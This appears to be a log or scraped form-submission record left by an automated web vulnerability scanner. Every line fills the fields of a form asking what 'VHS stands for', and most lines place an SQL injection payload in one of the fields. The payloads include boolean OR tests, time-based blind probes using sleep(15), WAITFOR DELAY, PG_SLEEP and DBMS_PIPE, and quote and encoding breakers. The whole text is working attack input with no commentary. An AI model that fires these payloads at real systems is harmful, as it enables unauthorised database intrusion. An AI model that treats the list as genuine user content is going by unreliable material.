-1' OR 3*2>(0+5+625-625) or '8VhYmKdP'=' , I think VHS stands for: 555
-1" OR 2+178-178-1=0+0+0+1 -- , I think VHS stands for: 555
-1" OR 3+178-178-1=0+0+0+1 -- , I think VHS stands for: 555
-1" OR 3*2<(0+5+178-178) -- , I think VHS stands for: 555
-1" OR 3*2>(0+5+178-178) -- , I think VHS stands for: 555
if(now()=sysdate(),sleep(15),0) , I think VHS stands for: 555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z , I think VHS stands for: 555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z , I think VHS stands for: 555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ , I think VHS stands for: 555
(select(0)from(select(sleep(15)))v)/*' (select(0)from(select(sleep(15)))v) '" (select(0)from(select(sleep(15)))v) "*/2 , I think VHS stands for: 555
1 waitfor delay '0:0:15' -- , I think VHS stands for: 555
VeDPDifF'; waitfor delay '0:0:15' -- , I think VHS stands for: 555
SKzy9hGY' OR 15=(SELECT 15 FROM PG_SLEEP(15))-- , I think VHS stands for: 555
dtEvJb92') OR 251=(SELECT 251 FROM PG_SLEEP(15))-- , I think VHS stands for: 555
2izyMFB4')) OR 909=(SELECT 909 FROM PG_SLEEP(15))-- , I think VHS stands for: 555
fnfOzvSR'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' , I think VHS stands for: 555
1'" , I think VHS stands for: 555
1ˤˢ%2527%2522 , I think VHS stands for: 555
@@uYphC , I think VHS stands for: 555
fnfOzvSR , I think VHS stands for: 555
fnfOzvSR , I think VHS stands for: 555
fnfOzvSR , I think VHS stands for: -1 OR 2+361-361-1=0+0+0+1 --
fnfOzvSR , I think VHS stands for: -1 OR 3+361-361-1=0+0+0+1 --
fnfOzvSR , I think VHS stands for: -1 OR 3*2<(0+5+361-361) --
fnfOzvSR , I think VHS stands for: -1 OR 3*2>(0+5+361-361) --
fnfOzvSR , I think VHS stands for: -1 OR 2+46-46-1=0+0+0+1
fnfOzvSR , I think VHS stands for: -1 OR 3+46-46-1=0+0+0+1
fnfOzvSR , I think VHS stands for: -1 OR 3*2<(0+5+46-46)
fnfOzvSR , I think VHS stands for: -1 OR 3*2>(0+5+46-46)
fnfOzvSR , I think VHS stands for: -1' OR 2+250-250-1=0+0+0+1 --
fnfOzvSR , I think VHS stands for: -1' OR 3+250-250-1=0+0+0+1 --
fnfOzvSR , I think VHS stands for: -1' OR 3*2<(0+5+250-250) --
fnfOzvSR , I think VHS stands for: -1' OR 3*2>(0+5+250-250) --
fnfOzvSR , I think VHS stands for: -1' OR 2+331-331-1=0+0+0+1 or 'NtvhJsmY'='
fnfOzvSR , I think VHS stands for: -1' OR 3+331-331-1=0+0+0+1 or 'NtvhJsmY'='
fnfOzvSR , I think VHS stands for: -1' OR 3*2<(0+5+331-331) or 'NtvhJsmY'='
fnfOzvSR , I think VHS stands for: -1' OR 3*2>(0+5+331-331) or 'NtvhJsmY'='
fnfOzvSR , I think VHS stands for: -1" OR 2+850-850-1=0+0+0+1 --
fnfOzvSR , I think VHS stands for: -1" OR 3+850-850-1=0+0+0+1 --
fnfOzvSR , I think VHS stands for: -1" OR 3*2<(0+5+850-850) --
fnfOzvSR , I think VHS stands for: -1" OR 3*2>(0+5+850-850) --
fnfOzvSR , I think VHS stands for: if(now()=sysdate(),sleep(15),0)
fnfOzvSR , I think VHS stands for: 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
fnfOzvSR , I think VHS stands for: 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
fnfOzvSR , I think VHS stands for: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
fnfOzvSR , I think VHS stands for: (select(0)from(select(sleep(15)))v)/*' (select(0)from(select(sleep(15)))v) '" (select(0)from(select(sleep(15)))v) "*/2
fnfOzvSR , I think VHS stands for: -1; waitfor delay '0:0:15' --
fnfOzvSR , I think VHS stands for: -1); waitfor delay '0:0:15' --
fnfOzvSR , I think VHS stands for: 1 waitfor delay '0:0:15' --
fnfOzvSR , I think VHS stands for: sYZwK0FK'; waitfor delay '0:0:15' --
fnfOzvSR , I think VHS stands for: -5 OR 154=(SELECT 154 FROM PG_SLEEP(15))--
fnfOzvSR , I think VHS stands for: -5) OR 614=(SELECT 614 FROM PG_SLEEP(15))--
fnfOzvSR , I think VHS stands for: -1)) OR 963=(SELECT 963 FROM PG_SLEEP(15))--
fnfOzvSR , I think VHS stands for: zTt9gZpp' OR 854=(SELECT 854 FROM PG_SLEEP(15))--
fnfOzvSR , I think VHS stands for: EM67uNiz') OR 124=(SELECT 124 FROM PG_SLEEP(15))--
fnfOzvSR , I think VHS stands for: TaHil6jd')) OR 980=(SELECT 980 FROM PG_SLEEP(15))--
fnfOzvSR , I think VHS stands for: 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
fnfOzvSR , I think VHS stands for: 555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
fnfOzvSR , I think VHS stands for: 1'"
fnfOzvSR , I think VHS stands for: 1ˤˢ%2527%2522
fnfOzvSR , I think VHS stands for: @@gZI4d
fnfOzvSR , I think VHS stands for: 555